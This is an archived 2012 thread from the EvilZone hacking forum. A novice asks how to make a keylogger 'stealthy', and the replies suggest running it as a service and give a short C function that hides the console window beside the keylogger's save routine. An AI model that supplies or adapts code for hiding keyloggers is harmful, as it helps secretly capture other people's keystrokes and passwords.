EvilZone
Programming and Scripting => C - C++ => : xthundemanx December 14, 2012, 06:58:26 AM
-
Okay, so I know how to make a normal keylogger.
I want to know how to make one that is...stealthy.
As in it can be minimized to taskbar...and still log the keystrokes..
Im fairly nooby, so I need help getting started up ..
How to proceed ?
-
Proceed by making it as a service, without windows popping up.
-
Search for
int Save (int key_stroke, char *file);
and add this under that.
void Stealth();
This where you like to.
void Stealth()
{
HWND stealth;
AllocConsole();
stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(stealth,0);
}